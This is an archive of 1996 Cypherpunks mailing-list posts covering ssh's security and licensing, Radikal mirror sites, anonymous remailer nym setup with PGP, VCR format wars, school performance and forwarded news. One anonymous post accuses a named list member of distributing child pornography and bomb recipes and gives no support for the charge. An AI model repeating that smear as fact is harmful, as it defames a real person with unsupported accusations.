anonymity of system users by concealing address, location and routing information. The problem becomes even more interesting when privacy protection and copyright protection must be combined in the same system. We seek fundamental papers on watermarking of digital data, on techniques for anonymous communications, and design and analysis of systems that protect copyright and/or privacy. A partial list of topics is as follows: + watermarking of digital data + anonymous communications + steganography + covert and subliminal channels in networks protocols + combining copyright and privacy protection + experiments and attacks + tradeoffs between performance and security Prospective authors should email their manuscripts (PostScript format only) or send six hard copies to one of the Guest Editors listed below, according to the following schedule. Please direct all email enquiries to slow at ee.mu.oz.au. Manuscript Due: March 1, 1997 Acceptance Notification: August 1, 1997 Final Manuscript Due: November 1, 1997 Publication Date: 2nd Quarter 1998 Ross Anderson Ingemar Cox Cambridge University Computer Lab NEC Research Pembroke Street 4 Independence Way Cambridge CB2 3QG, U.K. Princeton NJ 08540, USA Tel: +44 1223 33 47 33 Tel: +1 609 951 2722 Fax: +44 1223 33 46 78 Fax: +1 609 951 2482 Email: ross.anderson at cl.cam.ac.uk Email: ingemar at research.nj.nec.com Steven Low Nicholas Maxemchuk Dept. of Electrical Electronic Engr. ATT Laborataries University of Melbourne 600 Mountain Ave. Parkville, Vic 3052, Australia Murray Hill NJ 07974, USA Tel: +6 13 9287 9205 Tel: +1 908 582 6240 Fax: +6 13 9287 9188 Fax: +1 908 582 5807 Email: slow at ee.mu.oz.au Email: nfm at research.att.com From geeman at best.com Fri Sep 27 04:44:05 1996 From: geeman at best.com (geeman) Date: Fri, 27 Sep 1996 19:44:05 +0800 Subject: Tamper-Resistant Software from INTEL In-Reply-To: <3.0b16.32.19960926211900.00b94b20@mail.teleport.com> Message-ID: <324BA226.8E1@best.com> > > It means that if you do *ANYTHING* to try and adjust, modify, and/or > configure the software, it no longer functions. Sadly, Microsoft has beat > them to the punch on this technology. > > As far as I know, it has raised the bar, so to speak, but that's all. It may have raised it pretty far, but as we know there's nothing you can't do on untrustable hardware. Which Microsoftware are you referring to, BTW? gee. man. From M.T.Hamilton at lboro.ac.uk Fri Sep 27 05:01:38 1996 From: M.T.Hamilton at lboro.ac.uk (martin hamilton) Date: Fri, 27 Sep 1996 20:01:38 +0800 Subject: ssh - How widely used? In-Reply-To: <199609270039.TAA05797@homeport.org> Message-ID: On Thu, 26 Sep 1996, Adam Shostack wrote: > Theres a windows version, mac is under vauge development. SSH > is pretty cool, but the code base is somewhat messy, and its shows > signs of its origins in things like systems calls not having their > return values checked. Shame it costs $$$, though I appreciate that Tatu needs to eat... ;-) Perhaps Cedomir Igaly could be persuaded to release the source code to the Windows port he did ? Anyone else interested in getting a little group together to hack on this ? (under GPL or BSD style copyright) Martin From tank at xs4all.nl Fri Sep 27 06:29:04 1996 From: tank at xs4all.nl (tank) Date: Fri, 27 Sep 1996 21:29:04 +0800 Subject: radikal-mirror list as of 27-9-1996 Message-ID: <199609271027.MAA09630@xs1.xs4all.nl> Receive Radikal 154 by email: Send a empty message to radikal at xs4all.nl and you receive issue 154 by mail. http: http://www.xs4all.nl/~bslash/radikal/radikal.tar.gz Radikal-site unix http://www.xs4all.nl/~bslash/radikal/radi.zip Radikal-site dos-zip ftp: ftp://utopia.hacktic.nl/pub/replay/pub/incoming Radikal 154 in plaintext ASCII http://www.xs4all.nl/~radikal/radi154.tgz Radikal 154 unix archive http://www.xs4all.nl/~radikal/radi154.zip Radikal 154 dos-zip archive If you got your mirror up and running let us know Special mirror: de.soc.zensur de.org.politik.spd Radikal-sites: 1.BACK ONLINE http://www.xs4all.nl/~radikal 2.BACK ONLINE http://www.xs4all.nl/~tank/radikal 3.http://huizen.dds.nl/~tank/radikal 4.http://burn.ucsd.edu/%7Eats/RADIKAL/ 5.http://www.jca.or.jp/~taratta/mirror/radikal/ 6.http://www.serve.com/~spg/ 7.http://huizen.dds.nl/~radikal 8.http://www.canucksoup.net/radikal/index.html 9.http://www.ecn.org/radikal 10.http://www.well.com/~declan/mirrors/ 11.http://www.connix.com/~harry/radikal/index.htm 12.http://www.ganesa.com/radikal/ 13.http://www.denhaag.org/~radikal 14.http://www.knooppunt.be/~daniel/radikal 15.http://emma.unm.edu/radikal 16.http://www.tacacs.com/radikal/" 17.http://www.dsvenlo.nl/~vvd/radikal/ 18.http://www.why.net/home/static/radi 19.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 20.http://home.ipr.nl/~radikal/ 21.http://www.dreamy.demon.co.uk/occam/ 22.http://www.ibmpcug.co.uk/~irdial/live_free/ 23.http://zero.tolerance.org/radi/index.htm 24.http://www.meaning.com/library/radikal/ 25.http://www.walli.uwasa.fi/~tviemero/radikal 26.http://www.sko.it/~sfede/radi/index.htm 27.http://www.bart.nl/~sz/index.html 28.http://bellp.med.yale.edu/index.htm 29.http://www.euronet.nl/users/funest/radi/index.htm 30.http://fine.com/~rsr/radikal 31.http://www.lab.net/radikal 32.http://www.charm.net/~gbarren/radikal 33.http://login.datashopper.dk/~pethern/radikal/ 34.http://www.interlaw.com 35.http://hyperreal.com/~rich/radikal/index.html 36.http://www.citinv.it/iniziative/info/radikal/ 37.http://radikal.autono.net./rad 38.http://www.digiforest.com/~richards/radikal/ 39.http://brazil.nbn.com/radikal/ 40.http://pitel-lnx.ibk.fnt.hvu.nl/~madcat 41.http://www.hongo.ecc.u-tokyo.ac.jp/~ss56012/radikal/ 42.http://web.inter.nl.net/users/E.P.van.der.Vlis/radikal/ 43.http://www.threeweb.ad.jp/~fubuki71/mirror/radikal/ 44.http://mars.let.uva.nl/~bram/radikal/ 45.http://www.design.nl/~bram/radikal/ 46.http://www.eskimo.com/~quawk/radikal/ 47.http://www.luc.ac.be/~2sbs0 a passtrue page to xs4all and the radikal pages. 48.http://www.calyx.com/~refuse/radikal/ 49.http://www.altair.it/xxv 50.http://www.c2.net/radikal 51.http://www.grfn.org/~rtwo 52.http://www.grfn.org:4380 xs4all port mirror 53.http://www.cyberpass.net/radikal 54.http://www.xs4all.nl/~jeroenw/radikal/ 55.http://catalog.com/jamesd/radikal/ 56.http://www.islandnet.com/~hendrik/RADIKAL.html From adam at homeport.org Fri Sep 27 07:00:39 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 27 Sep 1996 22:00:39 +0800 Subject: ssh - How widely used? In-Reply-To: <199609270608.CAA24129@rat.eng.lycos.com> Message-ID: <199609271217.HAA07612@homeport.org> I have not found security holes in ssh-1.2.14, which is the version I've looked at most in depth. However, I have found things that are disquieting, and as such assume that clever professionals with time available might be able to exploit something. 'Standard' hackers with toolkits are likely to move to the next site. Adam Chad Dougherty wrote: | Adam Shostack writes: | > Theres a windows version, mac is under vauge development. SSH | > is pretty cool, but the code base is somewhat messy, and its shows | > signs of its origins in things like systems calls not having their | > return values checked. | > | > Despite all this, I use it, like it, and recomend it for use | > in systems not likely to come under attack by professionals. | > | > Adam | > | | Why do you say "not likely to come under attack by professionals"? | Have you found security holes in it? | | -Chad -- "It is seldom that liberty of any kind is lost all at once." -Hume From chris at cybernet.co.nz Fri Sep 27 07:46:59 1996 From: chris at cybernet.co.nz (Chris Wedgwood) Date: Fri, 27 Sep 1996 22:46:59 +0800 Subject: ssh - How widely used? Message-ID: <199609271206.AAA02796@cybernet.co.nz> :From: martin hamilton :To: cypherpunks at toad.com :cc: ssh at clinet.fi :Subject: Re: ssh - How widely used? : :On Thu, 26 Sep 1996, Adam Shostack wrote: : :> Theres a windows version, mac is under vauge development. SSH :> is pretty cool, but the code base is somewhat messy, and its shows :> signs of its origins in things like systems calls not having their :> return values checked. : :Shame it costs $$$, though I appreciate that Tatu needs to eat... ;-) : :Perhaps Cedomir Igaly could be persuaded to release the source code to the :Windows port he did ? Anyone else interested in getting a little group :together to hack on this ? (under GPL or BSD style copyright) : :Martin I have a hackery botch job that I have done to make ssh run in a Windows NT console session (untested under '95, but should work). The trouble is it contains a mix of commercial code (which I do not own and cannot distribute) and GNU code. Thus, I can use it myself - but not distribute it. I was speaking to someone yesterday about this, as I was at one stage thinking I may get the code cleaned up as much as possible (ie. only contain GNU code) and release it to the masses to play with. Eventually it might turn out to be something of use... Doing this would, perhaps, undermine Datafellows and Tatu somewhat. As someone who writes code to put food on the table, I wouldn't really feel comfortable doing this. Tatu has spent a whole heap of time on this, doing so wouldn't be fair this early. A freely available, albeit with no guarantee or support and fewer features version of ssh would surely effect sales to a reasonable extent? I would recommend people buy the product. If you fell it too expensive, then complain to datafellows about this. Eventually the make take some notice of these complaints, or have alternate pricing structures that make the product more attractive for your needs. IMO its not terribly expensive. Chris P.S. (Any replies to this please cc to me of ssh at clinet.fi as I don't read CP very often) From ronsimpson at unidial.com Fri Sep 27 09:34:09 1996 From: ronsimpson at unidial.com (ronsimpson) Date: Sat, 28 Sep 1996 00:34:09 +0800 Subject: Public Schools Message-ID: <324BD4FD.3372@unidial.com> I hate to burst any bubbles but, the school with the highest number of National Merit Finalists and highest number of 1600 SATs is a Public High School (Jefferson High in Fairfax, VA) From dustman at athensnet.com Fri Sep 27 10:11:58 1996 From: dustman at athensnet.com (Dustbin Freedom Remailer) Date: Sat, 28 Sep 1996 01:11:58 +0800 Subject: The daily reminder regarding Timothy C. May, the licenced fellatiologist Message-ID: <199609271340.JAA02217@godzilla.athensnet.com> Embedded in Timothy C. May's babblings are preposterous lies, wild distortions, child pornography (both as graphic descriptions and in JPEG format), ethnic slurs, and bomb- making recipes. No wonder he encrypts them. From perry at piermont.com Fri Sep 27 10:22:34 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 28 Sep 1996 01:22:34 +0800 Subject: ssh - How widely used? In-Reply-To: <199609270039.TAA05797@homeport.org> Message-ID: <199609271433.KAA08550@jekyll.piermont.com> Adam Shostack writes: > Theres a windows version, mac is under vauge development. SSH > is pretty cool, but the code base is somewhat messy, and its shows > signs of its origins in things like systems calls not having their > return values checked. > > Despite all this, I use it, like it, and recomend it for use > in systems not likely to come under attack by professionals. I actually think its probably okay even for systems that might come under professional attack -- I don't recommend it for use on systems that are mission critical, though, like systems running transactions and such. Indeed, I don't recommend running ANYTHING on such systems unless you are really, really, really careful about what you are running and where you are running it from. .pm From adam at homeport.org Fri Sep 27 10:23:20 1996 From: adam at homeport.org (Adam Shostack) Date: Sat, 28 Sep 1996 01:23:20 +0800 Subject: LivePGP (fwd) Message-ID: <199609271533.KAA08175@homeport.org> ----- Edited message from Ming-Ching Tiew ----- >From mctiew at csi.po.my Thu Sep 26 22:36:39 1996 Message-ID: <01BBAC57.C7351E60 at minuet> From: Ming-Ching Tiew To: "'Adam Shostack'" Subject: RE: LivePGP Date: Fri, 27 Sep 1996 09:39:21 +-800 Encoding: 38 TEXT Do you already have this information ? http://www.vv.com.au/vv/resources/security/livepgp/README.html The copy is expiring soon. I will soon be releasing a new copy which is much for polished. I am not releasing the source. ----- End of forwarded message from Ming-Ching Tiew ----- From jya at pipeline.com Fri Sep 27 10:24:07 1996 From: jya at pipeline.com (John Young) Date: Sat, 28 Sep 1996 01:24:07 +0800 Subject: HBO_ped Phill's AP Op-Ed Message-ID: <199609271432.OAA17432@pipe1.ny3.usa.pipeline.com> 9-27-96. NYP: "Unnoticed but Deadly, the I.R.A.'s Secret 'Sleeper' " Members of a counterterrorism force stormed the building where Mr. O'Neill lived, threw tear-gas canisters into his second-floor back apartment and shot him six times as he stood in the doorway. The police said Mr. O'Neill made a threatening gesture at them, but he was later found to have been unarmed. An intelligence officer said, "The sleeper is totally committed, aware of all the surveillance techniques and our ability to penetrate the organization. He knows when to keep his mouth shut. He stays as anonymous as possible." "South African Links Top Spy To the Slaying Of Olof Palme" The commander of a police hit squad testified today that the assassination, by a lone gunman who shot Mr. Palme in the back of the head, had been the work of Operation Long Reach, a secret apartheid-era program intended to harass, silence and gather information about opponents of South Africa's white-led Government abroad. "It was one of Craig Williamson's Operation Long Reach projects," he said. Officially, Mr. Williamson left the police department in 1985, ostensibly to go into business with an Italian millionaire operating from the Seychelles. In reality, he then started Long Reach, a company that did some legitimate international security work, but which was largely created to give him the cover to do whatever he pleased around the world. ----- http://jya.hboped.txt HBO_ped From rah at shipwright.com Fri Sep 27 10:35:12 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 28 Sep 1996 01:35:12 +0800 Subject: Public Schools Message-ID: I forwarded this to someone, who said: --- begin forwarded text From: somebody Date: Fri, 27 Sep 1996 00:26:28 -0400 To: rah at shipwright.com Subject: Re: Public Schools Bob, I'm not sure I want to get my name on this particular set of info, but the story on IQ and SAT scores is, to a certain extent, spelled out in "The Bell Curve." The simple, short version is for IQ where the distribution is nearly normal with a mean of 100 and a standard deviation of 15. (Recall that, in a normal distribution, two standard deviations above the mean (2-sigma) is achieved by only 1-2%, and 3-sigma, by a factor of 10 fewer.) There used to be a simple (public) answer for the SAT: mean of 500 and standard deviation of 100. So 500 = 100 and 800 = 145? Well, maybe. The answer for SAT (verbal) scores (1961 data only, sorry) is neither short nor simple. The distribution is decidely non-normal. The peak is at 280-ish, and the high side looks kind of like a normal distribution. If it were, the standard deviation would be 170 or so. Because of this, the average is 475-ish. Oh, well. Thus, maybe, an SAT of 800 = an IQ of 145. But 475 = 100? Or is it 280 = 100? And of course, the populations aren't even close to the same. Only those who might go to college take the SAT. And in 1961 that was even more so. Maybe that's why they call them social scientists. --- end forwarded text Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From rah at shipwright.com Fri Sep 27 10:45:46 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 28 Sep 1996 01:45:46 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: At 7:47 pm -0400 9/26/96, Mark M. wrote: > It is still active. However, there are many people who do not receive the > alt.* groups and those who do may only receive newsgroups "approved" by > the news admin. It is much more difficult to restrict distribution of > newsgroups carried by most major news feeds. Also, some NNTP servers may > expire alt groups faster than the other hierarchies which is very undesirable > for message pools. It seems that if newsgroup RFC and the whole rigamarole of newsgroup voting was set up, there would be enough people -- on this list alone, probably -- who would be interested enough in the idea to at least vote (publically) for it. I certainly would, just to see what happens. Of course, that means that someone *else* ;-) has to actually put the train on the track, much less lay the rails, which, as usual, is the main problem here. If we had some ham, we could have some ham and eggs, if we had some eggs. If you lived here, you'd be home now. And so forth. Same as it ever was. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From rah at shipwright.com Fri Sep 27 11:03:07 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 28 Sep 1996 02:03:07 +0800 Subject: In defense, sort of, of Phill Hallam-Baker In-Reply-To: <199609270005.TAA00319@smoke.suba.com> Message-ID: At 10:24 pm -0400 9/26/96, Timothy C. May wrote: > Any, I had several e-mail exchanges (in private) with Phill on this > subject, and I hardly think he's a "thoroughly lousy human being." Let me first say that I have my Mac Eudora filters set so that if any message contains Phill's e-mail address and cypherpunks it goes straight to the trash. Sorry, Phill, but most of what you say here only raises my blood pressure, so I'd rather not read it, or any of the justifiable but predictable responses people have here to it. Having said that, I do not bozo-filter Phill anywhere else on the net. The reason is, he makes valuable contributions to lists like micropay (which he started), or dcsb (which he is a founding member of), or any other non-political discussion he's in. With the exception of politics, in my opinion, he is *not* clueless. More to the point, Phill even shows up at DCSB meetings, and I think he's a nice guy, and I like to think that I can call him a friend. However, I also think that Phill has this passion for order that sometimes borders on the pathological. Maybe because, like Bertrand Russell (who Phill and I both admire) says, romanticism, leftism and communism are basically feudalism in disguise, and Phill's a closet aristocrat. ;-). Maybe not. I think what we see as his blustering trolls on this list come from passion. But, I don't think they're trolls at all. I think they show, more often than not, his outrage at the way the world's going to go. Which, obviously, is *our* way, and not his. He knows very well the power of the technology we talk about here, and deep down, I think he knows we're right. Phill, and Dorothy Denning, and David Sternlight, and other smart, nice (I haven't met Sternlight), and otherwise clueful people like them, are all living in a state of heavy denial right now, and they're very articulate about it. :-). I figure the best way to give them room is to just filter them out in places where they disturb me, and get on with the business of proving them wrong. They'll wake up. Everybody will, sooner or later. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From corbet at stout.atd.ucar.edu Fri Sep 27 11:04:13 1996 From: corbet at stout.atd.ucar.edu (Jonathan Corbet) Date: Sat, 28 Sep 1996 02:04:13 +0800 Subject: ssh - How widely used? In-Reply-To: Message-ID: <199609271501.JAA14868@atd.atd.ucar.EDU> > Does anyone know if there are MS-Dos or Mac versions of the ssh client? > How much is ssh used? Ssh is good stuff -- we use it here. Things I like: - It's an easy, drop-in replacement for the r* commands. It's easy to get people to use it. - It creates that much more encrypted traffic on the net. That can only be a good thing, eh? - There are a few different authentication modes, which makes life easy. Host keys can be used for fixed machines; per-user keys can sit on the laptop and work no matter whose network you've plugged into today. When my local ISP found a password sniffer running on his machine and went into red alert, I just smiled and didn't bother to change my passwords on hosts I had logged into via the ISP's net. Good stuff. jon Jonathan Corbet National Center for Atmospheric Research, Atmospheric Technology Division corbet at stout.atd.ucar.edu http://www.atd.ucar.edu/rdp/jmc.html From declan at well.com Fri Sep 27 11:09:00 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 28 Sep 1996 02:09:00 +0800 Subject: Columbian guerrillas get kicked off of the Net Message-ID: ---------- Forwarded message ---------- Date: Fri, 27 Sep 1996 07:25:03 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: Columbian guerrillas get kicked off of the Net [Perhaps it's time to mirror the Columbian guerrillas' home page? Volunteers, anyone? (I wonder what the British, had the Internet existed in 1776, would have done to muzzle the colonial rebels' web sites -- which would have called for a violent overthrow of the government. Perhaps the founding fathers' home pages would have been copied and mirrored in France?) --Declan] ********* Colombia censors guerilla home page By Reuters September 26, 1996, 4:15 p.m. PT A Colombian guerrilla group currently involved in a bloody offensive in the mountains and jungles, suffered a setback in its propaganda battle when its new voice on the Internet was mysteriously silenced. The Revolutionary Armed Forces of Colombia (FARC), which has periodically paralyzed half the country with road blocks, found its route to the information superhighway barred. The Communist insurgents, who rose up in arms in 1964, embraced new technology last year in their fight to overthrow the government by launching a home page on the Internet. "Using weapons naturally comes within the logic of the armed struggle. Just fighting through the Internet would be like shooting rubber bullets. Not using it would be like continuing to fight the army with a 12-bore shotgun," said Marco LeDon CalarcDa, the FARC's Mexico City-based international spokesman. But in unexplained circumstances, which a spokeswoman for the Mexico City-based Internet provider Teesnet said may or may not be linked to external pressures, the plug was pulled on the service Monday--a day after being publicized in Colombia's leading daily, El Tiempo. CalarcDa admitted the loss of the Internet page was a serious reversal but vowed the computer-age conflict was far from over. [...] The Colombian guerrillas used their Web site to publish their political magazine Resistencia, whose distribution is banned in Colombia, and to offer explanations about their latest armed actions. FARC, labeled narcoguerrillas since the 1980s when U.S. ambassador Lewis Tambs highlighted the group's alleged connections with Colombia's drugs trade, have been dubbed cyberspace guerrillas since their appearance on the Internet. "Cyberspace guerrillas may seem a fun name but I think it is pejorative and belittles what we're doing," said LeDon CalarcDa. "We are looking to topple the government and set up a new Colombia. In the four weeks since the FARC unleashed its latest offensive with an attack on a jungle base in southern Putumayo province, more than 150 soldiers, police, and civilians have died. ### From geeman at best.com Fri Sep 27 11:43:58 1996 From: geeman at best.com (geeman) Date: Sat, 28 Sep 1996 02:43:58 +0800 Subject: [Fwd: Email Robot draws fire from CypherPunkz] Message-ID: <324BF794.801@somewhere.gov> An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 11099 URL: From perry at piermont.com Fri Sep 27 12:17:35 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 28 Sep 1996 03:17:35 +0800 Subject: ssh - How widely used? In-Reply-To: <199609270608.CAA24129@rat.eng.lycos.com> Message-ID: <199609271552.LAA08679@jekyll.piermont.com> Chad Dougherty writes: > > Despite all this, I use it, like it, and recomend it for use > > in systems not likely to come under attack by professionals. > > Why do you say "not likely to come under attack by professionals"? > Have you found security holes in it? Security professionals do not recommend use of systems they feel less than perfectly comfortable with whether or not they know of specific holes. Perry PS sorry for posting something about a cryptographic security system in the midst of all the normal talk -- I know its off topic. From shamrock at netcom.com Fri Sep 27 12:48:04 1996 From: shamrock at netcom.com (Lucky Green) Date: Sat, 28 Sep 1996 03:48:04 +0800 Subject: "Soul Catcher" Computer Chip (fwd) Message-ID: What's next? Thought escrow? --Lucky ---- Forwarded Message from other list ------ Figured you might be interested in this. I copied it from Nexus Oct/Nov 1996. QUOTE SOUL CATCHER IMPLANTS British scientists are developing a concept for a computer chip which, when implanted into the skull behind the eye, will be able to record a person's every life time thought ands sensation. "This is the end of death," said Dr. Chris Winter of British Telecom's artificial-life team. He predicts that within thirty years it will be possible to relive other people's lives by playing back their experiences on a computer. "By combining this information with a record of a person's genes, we could recreate a person physically, emotionally and spiritually." Dr Winter and his team of scientists at BT's Martlesham Heath Laboratories, near Ipswich, call the chip "the Soul Catcher." British telecom would not divulge how much money it is investing in the project, but Dr. Winter said it was taking "Soul Catcher 2025" very seriously. He confessed there were profound ethical considerations, butr emphasised that BT was embarking on this line of research so it could keep at the forefront of communications technology. Dr. Winter said "an implanted chip would be like an aircraft's black box, and would enhance communications beyond current concepts. "For example, police would be able to use it to relive an attack, rape or murder from the victims viewpoint, to help catch the criminal... I could even play back the smells, sounds and sighs of my holidays to friends. Other more frightening applications include downloading an older person's experiences into a newborn baby by transplanting the chip. Sources: The Daily Telegraph, the Daily Mail, 18 July 1996 UNQUOTE From tcmay at got.net Fri Sep 27 12:48:48 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 28 Sep 1996 03:48:48 +0800 Subject: Public Schools In-Reply-To: <324BD4FD.3372@unidial.com> Message-ID: At 9:22 AM -0400 9/27/96, ronsimpson wrote: >I hate to burst any bubbles but, the school with the highest number of >National Merit Finalists and highest number of 1600 SATs is a Public >High School (Jefferson High in Fairfax, VA) I took some of my science classes at Jefferson. Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS. Help me before it's too late. (Seriously, my view is that schools are not very important. All success, academic or technical, derives from one basic determining factor: those who read for pleasure, succeed, and those who don't read for pleasure, don't. The young child who reads will usually keep reading, whether novels, encyclopedias, lists like this, etc. The child who is not into reading will likely never get into it later in life. Which is OK, as there is a serious shortage of tradesmen, at least in my area, and more kids ought to be taught usable trades. Seriously. Our "ideal" that all children should attend college is absurd, given the lack of academic preparation, desire, and reading skills that so many high school students lack. Most community colleges are essentially becoming Grades 13-14, with most of the Grade 13-14 students reading at the 9th-grade level (which most of us on this list were reading at when we were in the 7th-grade, or earlier).) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ericm at lne.com Fri Sep 27 13:12:11 1996 From: ericm at lne.com (Eric Murray) Date: Sat, 28 Sep 1996 04:12:11 +0800 Subject: ssh - How widely used? In-Reply-To: <199609271501.JAA14868@atd.atd.ucar.EDU> Message-ID: <199609271621.JAA25705@slack.lne.com> Jonathan Corbet writes: [stuff about SSH deleted] > When my local ISP found a password sniffer running on his machine and went > into red alert, I just smiled and didn't bother to change my passwords on > hosts I had logged into via the ISP's net. You probably should. There's more places to 'sniff' information than just from the network. An example is the Streams-based tty snooper. It pushes a Streams module between the tty and the shell. No encryption program can protect that, as it has to be in the clear unless you can do RC4 in your head. :-) The program I'm thinking of (sorry I forgot the name) lets the operator both read and write to any tty session on the machine. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm If you don't see the fnords, they won't eat your packets. If you do see the fnords, they will eat your packets, so you won't see them. PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From isptv at access.digex.net Fri Sep 27 13:20:28 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Sat, 28 Sep 1996 04:20:28 +0800 Subject: David Sobel interview on ISP-TV Monday Night Sept. 30 Message-ID: <199609271631.MAA02841@access5.digex.net> *** ISP-TV Program Announcement: David Sobel Interview *** Monday, Sept. 30 9:00 PM ET David Sobel is a legal counsel to the Electronic Privacy Information Center, and an outspoken crusader for Internet free speech, cryptographic rights, and on-line privacy. He has litigated dozens of Freedom of Information Act (FOIA) cases involving subjects such as the Digital Signature Standard, the Clipper Chip, the FBI's Digital Telephony proposal and the 2600/Pentagon City Raid. He has also written for WIRED magazine, and "The Net" online magazine. This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html See URL http://www.digex.net/isptv for more information about the ISP-TV Network To obtain CU-SeeMe software, see URL http://www.wpine.com/cudownload.htm From tcmay at got.net Fri Sep 27 13:47:14 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 28 Sep 1996 04:47:14 +0800 Subject: VCRS and Crypto In-Reply-To: <199609270322.UAA14111@mail.pacifier.com> Message-ID: At 8:22 PM -0800 9/26/96, jim bell wrote: >Remember the VHS/Beta VCR wars? With a fairly equal market in about 1978, >Beta died 10 years later because the market couldn't support two >incompatible standards. It wasn't that one was dramatically better than the >other, it was simply that having two standards forced the market to >duplicate stocks, for the machines as well as tapes, particularly >pre-recorded tapes. Notice, however, that VCR's are relatively "isolated": >It doesn't really matter if you have one format and your neighbor has >another, unless you want to swap tapes. But crypto telephones inherently >require (in the long term) full intercompability. If you didn't have that, >there'd be half a world of people you couldn't call! Be careful when drawing conclusions from the "VCR Wars." (BTW, James Lardner has a book out on this subject.) There are various interpretations of what happened. While I, for example, had both formats, I ultimately shelved my Beta unit. Some views often heard: * The longer recording time of VHS was more compelling to most consumers than the higher quality of Beta. Not surprising in the late 70s, early 80s, when most consumers had televisions incapable of showing the difference in quality. (Even today, most consumers are happy to rent VHS tapes which are rather "dodgy" in quality.) * VHS was "Pretty Good Video," and PGV was enough for its time. * Once VHS took a lead over Beta, the snowball effect took hold. Video rental stores started to appear in earnest in around 1980, and by then VHS had enough of a lead over Beta to cause the stores to stock VHS tapes for rental over Beta tapes. This dramatically widened the lead of VHS over Beta. (Jim's point: "Notice, however, that VCR's are relatively "isolated": It doesn't really matter if you have one format and your neighbor has another, unless you want to swap tapes." But in fact a large fraction of all VHS owners use their machines to _rent_ tapes, so the compatibility with what the many rental stores carry is paramount.) A tenuous link to crypto is that various VCR formats can still intercommunicate because they all use NTSC (or PAL, SECAM in some countries) as the "common language." This is analogous to the way various flavors of PGP on various platforms can communicate with other flavors because ASCII text is read and written by all. As I have argued many times, this was really the Big Win for PGP, that it did not use an odd or proprietary format that was platform-specific. Such basic ASCII operation ensures interoperability, and is of course inconsistent with the government talk of making sure that key-escrow products cannot interoperate with non-key-escrow or "alternately"-escrowed products. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From mixmaster at remail.obscura.com Fri Sep 27 13:50:12 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Sat, 28 Sep 1996 04:50:12 +0800 Subject: Jena Remailer Message-ID: <199609271630.JAA24185@sirius.infonex.com> wmono at Direct.CA wrote: w> On Sun, 22 Sep 1996, Mixmaster wrote: >> Can any native English speaker please paraphrase the account >> start-up procedure for us? w> I took a stab at re-writing the help file, and I've attached it below. w> The operator of jena might want to use it instead of the help file w> currently being distributed, after correcting any errors and adding w> the German sections back in. OK, it's an improvement, but there's still some obscurity and a couple of other problems: w> I believe these instructions are correct -- I was able to follow them w> to create a nym, and use it. YMMV. So far I have had no luck, but this may be due to a mail lag, I dunno... w> * The hexadecimal key-ID forms the Email address. For example, if the nym's key is 0x01020304, the address will be: anon-01020304 at as-node.jena.thur.de Already a confusion: Is not the address pseudonym at as-node.jena.thur.de? And, since the key ID is an eight-digit hex number, why the confusing "...if the nym's key is 0x01020304, the address will be:" ^^ ...or am I missing something already? w> * The user-ID of the key contains the pseudonym, only. Note: This is different from the convention, which is to include the Email address in angle brackets. OK, so if I understand this properly, when prompted for an account name in PGP one simply enters pseudonym ...with no quotes or address ("pseudonym" ). w> If the signature is valid, the decrypted body should be a header for w> the outbound mail, followed by a blank line, then the body for the w> outbound mail. The following are headers considered valid by the w> server: w> * Subject: (or Anon-Subject:) w> * To: (or Anon-To:) w> * Newsgroups: (or Post-To: or Anon-Post-To:) The header fields in parens are identical in function or not? w> - Run 'pgp -esa -u "pseudonym" anon at as-node anonid.asc' to sign and w> encrypt the extracted key for the server. These various command lines in the helpfile do not work in the pre-legal PGP 2.6/uix/ui versions preferred by many, though equivalent command lines of course exist. w> - Test your nym by posting to a test group (de.test is recommended due to the location of the server) and wait several days before requesting mail delivery. Well, the sent message didn't show up in the newsgroup here, but there are often lengthy delays anyway... w> - If it didn't work, repeat the entire procedure. It's possible that the key-ID already exists in the server's database and belongs to another pseudonym. The procedure didn't produce results for me so far, but before trying again I wish to get confirmation that I am trying properly: (Shortform directions) 1: Generate key 